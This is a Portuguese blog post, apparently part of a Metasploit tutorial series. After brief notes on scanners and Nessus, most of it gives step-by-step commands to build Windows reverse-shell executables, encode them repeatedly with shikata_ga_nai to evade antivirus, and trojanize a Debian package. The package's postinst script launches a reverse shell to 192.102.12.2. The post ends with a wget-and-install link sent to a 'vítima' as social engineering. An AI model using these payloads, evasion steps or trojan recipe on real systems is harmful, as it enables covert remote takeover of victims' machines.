– root@injetionsec:~#

Comandos do metasploit – part 4

06.10.2014 (5:23 pm) – Filed under: Pentest ::

Veja :

comandos do metasploit – parte 1
comandos do metasploit – parte 2
comandos do metasploit – parte 3

Galera,continuando a nossa séria de posts de metasploit, vejam:

Serviço de indentificação : o nmap realiza o scanner de varios serviços na rede destino,temos também uma veriedade de scanner para
determinados serviços e objetivos no metasploit

msf > search auxiliary ^scanner

Nessus no msfconsole: tem aquelas situações que optamos por usar linha de comando utilizando o nessus diretamente no metasploit, o
nessus e um scanner de vulnerabilidade

msf > load nessus
msf > nessus_help

Startamos o nessus e depois podemos ver os plugins instaldos no comando acima “nessus_help”, percebemos que o nessus e bastante
completo,Para ver as políticas de exploração que está disponivel utilizamos o seguinte comando “nessus_policy_list”

msf > nessus_policy_list

Fuzzer : e uma ferramenta utilizada por profissionais de segurança para para ver se os dados são validos e se tem algum aviso de
entrada valida no programa, e muito utilizado em buffer overflow,ataques de diretorio transversal,vulnerabilidade web de injecção,como
xss,slqi, e muitas outras, o metasploit ofere um modulo para essas tarefas
Binarios, payloads : uma das capacidades do metasploit e gerar um executavel a partir de um payload, isto e muito util nos casos de
engenharia social onde podemos conseguir executar esse payload se passando por um software autentico,vamos gerar um payload de shell
inverso para conseguir acesso remoto ao sistema, vamos utilizar o “msfpayload” este comando ira gerar cargas para ser usado em um
serie de variedades de ataques,veja os comandos

root@bt:# msfpayload windows/shell_reverse_tcp O
root@bt:# msfpayload windows/shell_reverse_tcp LHOST=[SEU IP] LPORT=31337 O
root@bt:# msfpayload windows/shell_reverse_tcp LHOST=192.102.12.2 LPORT=31337 X > /tmp/progr.exe

Agora temos um executavel para funcionar no windows, vamos agora usar o “multi/handler”

msf > use exploit/multi/handler
msf exploit(handler) > show options
Quando se utiliza o modulo “exploit/multi/handler” temos que direcinar um payload para assim injetar

msf exploit(handler) > set payload windows/shell/reverse_tcp
msf exploit(handler) > show options
msf exploit(handler) > set LHOST [SEU IP]
msf exploit(handler) > set LPORT 31337
msf exploit(handler) > exploit

Bypass em antivurus : muitos payload gerados nos metasploit podem baypass os antivirus, mas vemos que a maioria esta atualizada e um
pouco obsoleto,vamos codificar o nosso executavel produzido utilizando o comando como msfencode com a seguinte flag “-h” para vermos
os comandos

root@bt:/pentest/exploits/framework3# msfencode -h

Vamos ver qual codificadores podemos injetar com a seguinte flag “-l”

root@bt:/pentest/exploits/framework3# msfencode -l

Iremos então codificar o com o shikata_ga_nai em executaveis do windows

root@bt:/pentest/exploits/framework3# msfpayload windows/shell_reverse_tcp LHOST=192.102.12.2 LPORT=31337 R | msfencode -e
x86/shikata_ga_nai -t exe > /tmp/prog2.exe

Se formos verificar esse arquivos em scanner online de malware vemos o seguinte resultado

http://virusscan.jotti.org/pt-br/scanresult/e528fc54926dec35e3a1f60892ac07e5de9ec59c

Vamos então tentar usar 3 codificadores diferentes para com 10 vezes cada um,vamos ter um binario mais trabalhado vejamos o camando

root@bt:/pentest/exploits/framework3# msfpayload windows/shell_reverse_tcp LHOST=192.102.12.2 LPORT=31337 R | msfencode -e
x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t raw -c 10 | msfencode -e x86/countdown -t
exe > /tmp/prog2.exe

Podemos perceber que na maioria das vezes os antivurus com mais codificadores injetados podem ser sucessivel a encontrar algum binario
malicioso ou não, mas hoje a maioria

Para prosseguir com o ataque você pode mandar esse binario para o alvo e executa-lo, ja na maquina alvo execute o seguinte comando

root@bt:/pentest/exploits/framework3# msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.102.12.2 LPORT=31337 E

Criando trojan em linux : vamos descarregar um pacote para que possamos infecta-lo,vejam os comandos

root@bt:/pentest/exploits/framework3# apt-get –download-only install [qualquer pacote]
root@bt:/pentest/exploits/framework3# mkdir /tmp/pacote
root@bt:/pentest/exploits/framework3# mv /var/cache/apt/archives/[qualquer pacote].deb /tmp/pacote
root@bt:/pentest/exploits/framework3# cd /tmp/pacote
root@bt:/tmp/pacote

Vamos então extrair o pacote e criar um diretorio chamado DEBIAN para assim manter-mos as mesmas caracteristicas dele.

root@bt:/tmp/pacote# dpkg -x [qualquer pacote].deb work
root@bt:/tmp/pacote# mkdir work/DEBIAN

entramos no diretorio debian e criamos um arquivo “control” com as seguintes informações:

Package: nome do pacote
Version: 1.56-1
Section: Games
Priority: optional
Architecture: i386
Maintainer: Ubuntu Developers (ubuntu-dev@ubuntu.com)
Description: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

vamos criar também um script de pos instalação quando o binario for executado,chamado “posinstall”

root@bt:/tmp/evil/work/DEBIAN# nano postinst
#!/bin/sh
sudo chmod 2777 /usr/games/[nome do pacote] && /usr/games/[nome do pacote] & /usr/games/pacote &

Agora vamos criar um payload malicioso e uma shell inversa para conectar com nosso pacote

root@bt:/pentest/exploits/framework3# msfpayload linux/x86/shell/reverse_tcp LHOST=192.102.12.2 LPORT=443 X >
/tmp/evil/work/usr/games/freesweep_scores

Agora vamos executar nossa instalação e construção do novo pacote, esse arquivo se chamara “arq.deb” que vai se chamavar novamente com
o nome do arquivo original do pacote

root@bt:/tmp/pacote/work/DEBIAN# chmod 755 postinst
root@bt:/tmp/pacote/work/DEBIAN# dpkg-deb –build /tmp/evil/work
root@bt:/tmp/pacote# mv arq.deb nome do pacote original.deb
root@bt:/tmp/pacote# cp pacote original.deb /var/www/

Startamos o servidor apache

root@bt: /etc/init.d/apache2 start
root@bt:/pentest/exploits/framework3# msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.102.12.2 LPORT=443 E

Agora passamos o link para vitima baixar, apos isso a maquina alvo vai executar os seguintes comandos

ubuntu@server:~$ wget http://192.102.12.2/nome do pacote original.deb
ubuntu@server:~$ sudo dpkg -i nome do pacote original.deb

È isso ai galera fico por aqui, ate o próximo tópico.